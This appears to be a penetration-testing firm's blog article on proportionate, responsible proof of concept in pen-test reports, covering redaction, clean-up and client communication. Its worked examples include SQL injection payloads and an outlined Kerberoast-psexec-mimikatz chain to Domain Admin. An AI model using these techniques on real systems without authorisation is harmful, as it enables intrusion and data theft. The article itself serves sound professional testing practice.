Responsible Proof of Concept in Penetration Testing

The Evidence Problem

Nobody fixes a finding they don't believe.

A penetration test report lands on the IT Director's desk. Finding #7: SQL injection in the customer search endpoint. Severity: High. Remediation: parameterise all database queries. The IT Director forwards it to the development lead. The development lead reads the description, looks at the evidence — a screenshot of Burp Suite showing an error-based response — and says: "That's the test environment. The WAF would catch this in production. I'll add it to the backlog."

Six months later, the same vulnerability is exploited by an attacker who exfiltrates 90,000 customer records. The development lead's WAF theory was wrong. But the pen test report never proved it was wrong — it showed that the injection existed without demonstrating what it could achieve.

Now imagine the same finding, different evidence. The report includes a screenshot of 10 rows extracted from the production customer table (with PII redacted), the exact SQL payload used, the time taken (under 30 seconds), and a note confirming that the WAF did not block the request. The development lead doesn't add this to the backlog. They fix it that afternoon.

The vulnerability was identical. The remediation was identical. The difference was the proof of concept — and that difference determined whether the finding was fixed or forgotten.

The Credibility Equation

A finding without convincing proof of concept is a suggestion. A finding with strong PoC is a fact. The entire value of a penetration test — the remediation it drives, the risk it reduces, the investment it justifies — rests on whether the people reading the report believe the findings are real, exploitable, and consequential.

Why PoC Matters

The four things proof of concept achieves.

Proof of concept isn't an optional flourish added to impress the reader. It serves four distinct functions, each of which directly affects whether the pen test delivers real value or gathers dust.

Function	What It Does	What Happens Without It
Eliminates doubt	Confirms the vulnerability is real and exploitable in the specific environment — not a false positive, not a theoretical risk, not something the WAF would catch.	Findings are disputed: "Are you sure this works in production?" "Our security controls should block this." "The scanner flags this every time — it's a known false positive." Disputed findings don't get fixed.
Quantifies impact	Demonstrates exactly what an attacker would achieve: the data they'd access, the privileges they'd gain, the systems they'd reach. Turns abstract risk into concrete consequence.	Impact is vague: "could lead to data breach." Every medium-severity finding says this. Without specific, demonstrated impact, the finding competes equally with 29 others for remediation resources.
Enables reproduction	Provides the development team with exact steps, payloads, and parameters to reproduce the finding in their own environment — essential for building, testing, and validating a fix.	Developers can't reproduce the finding: "We tried what the report described and it didn't work." Without reproducible PoC, the development cycle stalls. The fix is guessed at rather than verified.
Drives urgency	Creates an emotional and rational response: "Someone demonstrated they can access our customer database." That visceral realisation — this actually works — is what turns a finding from a line in a spreadsheet into an emergency.	Findings are prioritised by CVSS score and triaged into the normal development cycle. A high-severity finding with weak PoC sits in the backlog for months. The same finding with strong PoC is fixed in days.

The Spectrum

Too little, just right, too much.

Proof of concept exists on a spectrum. At one end, insufficient PoC fails to convince anyone the finding is real. At the other end, excessive PoC goes beyond what's needed to prove impact and enters territory that creates unnecessary risk, damages trust, or raises legal concerns.

The skill — and it is a skill, not a formula — lies in finding the point that's sufficient to prove the finding is real and impactful, without going a single step further than necessary.

	Insufficient PoC	Appropriate PoC	Excessive PoC
SQL injection	"The parameter appears to be injectable based on error message differences." No extraction demonstrated.	10 rows extracted from the customer table using a `UNION SELECT` with `LIMIT 10`. PII redacted in the report. Exact payload, request, and response documented.	Full database dump of 90,000 records extracted and included in the report appendix. Real customer PII visible in the evidence.
IDOR	"Changing the ID parameter returns a different response." No demonstration that it's another user's data.	3 different user IDs tested, each returning a different customer's profile data. Screenshots show the parameter change and the corresponding data. Pattern confirmed as systemic.	All 43,000 user IDs enumerated. A CSV export of every customer's profile data included as evidence.
Domain Admin	"A Kerberoastable account was identified." No cracking attempted, no DA logon demonstrated.	Hash cracked offline in 4 minutes. DA logon demonstrated via `whoami /groups`. Screenshot shows the privileged context. No AD modifications made.	Tester creates a new Domain Admin account, resets the KRBTGT password, or accesses every mailbox to "prove" the extent of access.
Remote code execution	"The file upload function accepts PHP files." No execution confirmed.	Minimal PHP file uploaded, executes `whoami` and `hostname`. Screenshot of output. File immediately removed. Clean-up confirmed.	Full web shell deployed with file browser, command execution, and database access. Left in place "for the client to see."
Credential exposure	"Credentials were found in a public repository." No validation that they work.	Credentials tested against the target system. Successful authentication demonstrated via screenshot. Access level documented. Password partially redacted in the report.	Credentials used to log into every system they grant access to. Internal emails read. Documents downloaded. Screenshots of sensitive internal communications included in the report.

The middle column is the target. Every example follows the same principle: demonstrate the vulnerability is real, demonstrate the impact is significant, then stop. The left column doesn't prove enough to drive action. The right column proves more than necessary and creates new risks in the process.

The Damage of Excess

What happens when PoC goes too far.

Excessive proof of concept isn't just unnecessary — it actively harms the engagement, the client relationship, and potentially the tester's own legal position. The consequences are real and avoidable.

Data Protection Liability

Extracting a full database of customer records during a pen test creates a data protection obligation. The tester becomes a processor of personal data under UK GDPR. If that data is mishandled — stored insecurely, retained too long, transmitted without encryption — the tester and the testing firm are liable. Extracting 10 rows creates minimal risk. Extracting 90,000 creates a data breach waiting to happen.

Erosion of Trust

When a client sees that the tester accessed every mailbox on the domain, read internal HR documents, or extracted the CEO's personal files, the reaction isn't "what a thorough test" — it's "who gave you permission to do that?" Trust is the foundation of the testing relationship. Excessive PoC erodes it, and once eroded, the client may never commission another test from that provider.

Legal Exposure

The Computer Misuse Act 1990 authorises the tester to access systems defined in the scope. Accessing data or systems beyond what's necessary to demonstrate the finding may exceed the bounds of that authorisation — particularly if the rules of engagement specify minimum necessary access. Exceeding authorisation is not a grey area; it's a criminal offence.

Report Contamination

A report containing real customer PII, sensitive internal documents, or confidential communications becomes a security risk in itself. Every person who reads the report has access to that data. If the report is stored insecurely, emailed in the clear, or retained beyond its useful life, the pen test has inadvertently created the very exposure it was supposed to prevent.

Remediation Distraction

When the conversation after a pen test is about what the tester did rather than what the vulnerabilities are, the engagement has failed. Excessive PoC shifts the focus from "how do we fix this?" to "why did you access that?" — and the vulnerabilities stay unpatched while the relationship is repaired.

The Framework

Five principles for responsible PoC.

Responsible proof of concept isn't subjective — it follows a clear set of principles that can be applied consistently across every finding, every engagement, and every tester.

Principle	What It Means	How to Apply It
1. Minimum sufficient evidence	Capture the least amount of data and access needed to prove the finding is real and its impact is clear. No more.	SQL injection: extract 5–10 rows, not the full table. IDOR: test 3–4 IDs, not all of them. DA: demonstrate the logon, don't create accounts. RCE: run `whoami`, don't install a persistent shell.
2. Impact over access	The goal is to demonstrate what an attacker could achieve, not to achieve it in full. The PoC proves the potential; it doesn't realise it.	Instead of exfiltrating all customer data, extract a sample and state: "All 43,000 records are accessible via this method. We retrieved 10 as evidence." The sample proves the vulnerability; the number proves the scale.
3. Redact by default	Any personal data, credentials, or sensitive information captured as evidence should be redacted in the report unless the unredacted content is essential to understanding the finding.	Show extracted data with PII replaced: `john.s**@acme.co.uk`. Show cracked passwords partially: `W1nt*25!`. The finding is equally credible with or without the full values.
4. Clean up immediately	Every artefact created during PoC — uploaded files, test accounts, registry entries, web shells, scheduled tasks — is removed immediately after the evidence is captured.	Maintain a running clean-up log. Check every item off before the engagement closes. Include a clean-up confirmation section in the report. Leave nothing behind.
5. Communicate before you escalate	If the PoC requires access to particularly sensitive data or systems — the CEO's mailbox, the HR database, the finance system — check with the client before proceeding.	A quick call: "We've achieved DA and can access the mailbox server. Do you want us to demonstrate access to a specific mailbox, or is the DA logon sufficient evidence?" This takes 30 seconds and prevents 30 days of relationship repair.

Worked Examples

Responsible PoC for common findings.

To make the framework concrete, here's how responsible PoC applies to the findings we encounter most frequently. Each example shows what to capture, what to redact, and where to stop.

PoC: SQL Injection — Customer Search Endpoint
# Step 1: Confirm injection
payload= "' OR 1=1--"# Response differs from clean request
confirmed= true# Error-based + blind boolean confirmed

# Step 2: Demonstrate impact
payload= "' UNION SELECT id,email,name FROM customers LIMIT 10--"
rows_returned= 10# Sufficient to prove full read access
total_rows= 43291# Confirmed via COUNT(*) — not extracted

# Step 3: Document and stop
evidence= request + response (screenshot)
redaction= emails and names partially masked
waf_bypass= confirmed (no blocks observed)
stop_reason= impact demonstrated, no further extraction needed

PoC: Privilege Escalation — Standard User to Domain Admin
# Step 1: Enumerate escalation paths
bloodhound--collect=all# Shortest path: 3 hops to DA
path= user → kerberoast svc_sql → logon to DB01 → extract DA hash

# Step 2: Execute chain
kerberoastsvc_sql → cracked in 7 minutes# Password: Summer2***
psexecsvc_sql@DB01 → local admin confirmed
mimikatz→ DA hash extracted from memory
da_logon→ DC01 'whoami /groups' confirms DA

# Step 3: Document and stop
evidence= screenshots at each step + timeline
total_time= 2h 14m from standard user to DA
NOT_done= no new accounts, no GPO changes, no password resets
stop_reason= DA demonstrated, objective achieved

The Quality Spectrum

Recognising good PoC in a pen test report.

As the client receiving a pen test report, you can assess the quality of proof of concept by looking for specific indicators. Strong PoC doesn't just prove the tester is technically capable — it demonstrates professional judgement, ethical awareness, and respect for your data.

Indicator	Strong PoC	Weak PoC
Evidence type	Full request/response pairs, timestamped screenshots, attack narrative explaining each step, reproduction instructions	A single screenshot with no context, or a paragraph describing what the tester claims happened without supporting evidence
Data handling	Extracted data is minimal (5–10 rows), PII is redacted, and the report states how much additional data was accessible without extracting it	Large volumes of unredacted data included in the report, or no data extracted at all (just a claim that access was possible)
Proportionality	The level of exploitation matches the finding. A confirmed SQLi with 10 sample rows. A DA logon with `whoami`. An RCE with a single command execution.	Either under-proven ("this may be exploitable") or over-proven (full database dump, persistent backdoor left in place, sensitive documents included in the report)
Reproducibility	Step-by-step reproduction instructions that a developer can follow independently to verify the finding and test their fix	Vague descriptions: "inject a payload into the search field" without specifying which payload, which parameter, or what response to expect
Impact clarity	Specific impact statement: "43,291 customer records accessible. Mandatory ICO notification under UK GDPR. Estimated regulatory fine: up to 4% of annual turnover."	Generic impact: "could lead to data breach" or "may allow unauthorised access" — language that applies to any finding at any severity
Clean-up confirmation	Report includes a section listing every artefact created during testing and confirming its removal	No mention of clean-up, or an assumption that the client knows what was left behind

Sensitive Targets

PoC when the stakes are highest.

Some targets require extra care — not because the methodology changes, but because the consequences of getting PoC wrong are amplified. When the data is more sensitive, the margin for excess is smaller, and the communication with the client needs to be more deliberate.

Target	Additional PoC Considerations
Healthcare data	Patient records carry legal protections beyond standard GDPR (Caldicott Principles, NHS Data Security and Protection Toolkit). Extract zero real patient data if possible — demonstrate access to the table structure and row count without retrieving identifiable records. If extraction is essential, use synthetic or obviously-test records where available.
Financial systems	Never demonstrate a business logic flaw by completing a real financial transaction, even a small one. Demonstrate the ability to reach the transaction endpoint, document the parameters, and explain the theoretical outcome. If a test environment supports it, execute the transaction there.
Email and communications	Demonstrating mailbox access doesn't require reading real emails. Show that the mailbox is accessible (screenshot of the inbox list without opening messages), document the access path, and stop. Reading internal communications creates confidentiality obligations that outlast the engagement.
HR and personnel data	Salary data, disciplinary records, and performance reviews are among the most sensitive categories of internal data. If your attack path reaches the HR system, demonstrate that you can access it — not what's in it. A screenshot of the HR application's dashboard is proof enough.
Legal and M&A documents	Access to legal hold data, active litigation files, or M&A documentation could have regulatory implications (insider trading, legal privilege). If the path reaches these systems, inform the client immediately and agree on evidence capture before proceeding.
Operational technology	OT environments control physical processes — manufacturing, energy, water treatment. PoC in OT should demonstrate network access to the OT segment and identification of control systems, never direct interaction with PLCs, SCADA interfaces, or safety systems.

The Client's Role

What you should expect and what to ask.

Responsible PoC isn't solely the tester's responsibility. The client shapes the engagement through the rules of engagement, the scoping conversation, and ongoing communication during testing. Here's how to ensure the PoC in your engagement is both credible and responsible.

Define PoC Expectations in the RoE

Specify what level of evidence you expect. Do you want full exploitation or documented-but-unexploited findings for certain vulnerability classes? Should the tester contact you before accessing sensitive systems? Should data extraction be limited to synthetic or test records where available? These preferences belong in the rules of engagement, not in a post-engagement complaint.

Agree an Escalation Channel

Provide the tester with a named individual who can authorise or restrict PoC activities in real time. When the tester calls to say "I've reached Domain Admin and can access the mailbox server — shall I demonstrate?", someone needs to make that decision within minutes, not days.

Ask About Data Handling

Before the engagement: how will extracted data be encrypted, stored, retained, and destroyed? After the engagement: confirm that all extracted data has been securely destroyed. Request a written confirmation. This isn't paranoia — it's data governance.

Review the Evidence Critically

When the report arrives, assess each finding's PoC: is it sufficient to believe the finding is real? Is it proportionate to the severity? Is any data included that shouldn't be? Strong PoC should make you confident in the finding. Excessive PoC should make you concerned about the tester's judgement.

Provide Feedback

Tell your provider if the PoC was too conservative ("we didn't find this convincing enough to justify the remediation investment") or too aggressive ("we didn't expect you to access actual customer records"). Calibration improves with feedback, and the provider should welcome it.

False Positives

How PoC eliminates the noise.

Beyond credibility and impact, proof of concept serves a quieter but equally important function: it eliminates false positives. Vulnerability scanners generate false positives at a rate that ranges from irritating to overwhelming — findings that look real in the scanner output but aren't exploitable in the specific environment.

Scanner Says...	PoC Reveals...
"SQL injection detected in the search parameter" (based on a time delay in the response)	The time delay is caused by a slow database query, not by injected SQL. The parameter is correctly parameterised. Finding is a false positive.
"Cross-site scripting in the name field" (based on reflected output)	The output is reflected but HTML-encoded. The XSS payload renders as text, not as executable code. Finding is a false positive.
"Remote code execution: Apache Struts CVE-2017-5638" (based on version banner)	The server returns an Apache Struts banner but is actually running a different framework behind a reverse proxy. The CVE doesn't apply. Finding is a false positive.
"Open redirect in the login return URL" (based on parameter manipulation)	The redirect is restricted to a whitelist of internal domains. External URLs are rejected. The scanner didn't test the whitelist. Finding is a false positive.
"SSL certificate hostname mismatch" (flagged during scan)	The mismatch only occurs on an internal hostname that isn't accessible from the internet. The public-facing certificate is correct. Finding is accurate but irrelevant to external risk.

Every false positive that reaches the remediation backlog wastes developer time, erodes trust in the testing process, and dilutes attention from the findings that actually matter. Manual PoC verification eliminates false positives before they enter the report — ensuring that every finding your team works on is confirmed, exploitable, and worth fixing.

Summary

The bottom line.

Proof of concept is what makes a pen test finding credible, actionable, and urgent. Without it, findings are suggestions that compete for remediation resources based on abstract severity scores. With it, findings are facts — demonstrated, evidenced, and impossible to deprioritise.

But PoC that goes too far creates its own risks: data protection liability, trust erosion, legal exposure, and a remediation conversation that focuses on the tester's conduct rather than the organisation's vulnerabilities. The line between sufficient and excessive isn't arbitrary — it's defined by a clear principle: demonstrate the impact with the minimum evidence necessary, then stop.

The best proof of concept leaves no doubt that the vulnerability is real, no question about what an attacker could achieve, and no unnecessary data in the report. That's the standard every finding should meet — and it's the standard that turns a pen test from a document into a decision.

Evidence That Drives Action

Credible findings. Responsible proof.

Every finding in our reports is backed by proportionate, responsible proof of concept — sufficient to drive remediation, careful enough to protect your data, and documented to a standard that satisfies boards, auditors, and regulators.

Commission a Pen Test Read: What Exploitation Means

All Posts Get in Touch